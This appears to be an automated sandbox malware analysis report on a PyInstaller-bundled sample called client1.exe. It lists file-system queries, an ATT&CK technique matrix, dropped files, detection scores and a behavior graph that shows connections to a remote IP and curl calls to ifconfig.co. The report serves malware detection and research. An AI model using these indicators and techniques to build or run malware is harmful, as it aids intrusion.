Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_ssl.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md.cp311-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md__mypyc.cp311-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson\_speedups.cp311-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\images\new214_173.254.250.69.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F62B580 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF79F62B580
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F644E20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF79F644E20
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE82B5D bind,WSAGetLastError,2_2_00007FFBAAE82B5D

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		11
Process Injection		11
Process Injection		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory31
Security Software Discovery		Remote Desktop ProtocolData from Removable Media11
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager1
System Network Configuration Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Timestomp		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets22
System Information Discovery		SSHKeylogging2
Application Layer Protocol		Scheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548293 Sample: client1.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 56 35 ifconfig.co 2->35 43 Machine Learning detection for sample 2->43 45 Uses known network protocols on non-standard ports 2->45 47 AI detected suspicious sample 2->47 9 client1.exe 43 2->9         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 9->27 dropped 29 C:\Users\...\_speedups.cp311-win_amd64.pyd, PE32+ 9->29 dropped 31 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 9->31 dropped 33 20 other files (none is malicious) 9->33 dropped 49 Potentially malicious time measurement code found 9->49 13 client1.exe 2 9->13         started        signatures6 process7 dnsIp8 41 146.70.87.211, 49706, 49710, 49711 TENET-1ZA United Kingdom 13->41 16 cmd.exe 1 13->16         started        18 cmd.exe 1 13->18         started        process9 process10 20 curl.exe 1 16->20         started        23 conhost.exe 16->23         started        25 conhost.exe 18->25         started        dnsIp11 37 ifconfig.co 172.67.168.106, 49709, 80 CLOUDFLARENETUS United States 20->37 39 127.0.0.1 unknown unknown 20->39

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
client1.exe5%ReversingLabs
client1.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI40522\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_queue.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\bcrypt\_bcrypt.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md__mypyc.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\libcrypto-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\libffi-8.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\libssl-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI40522\python3.dll0%ReversingLabs
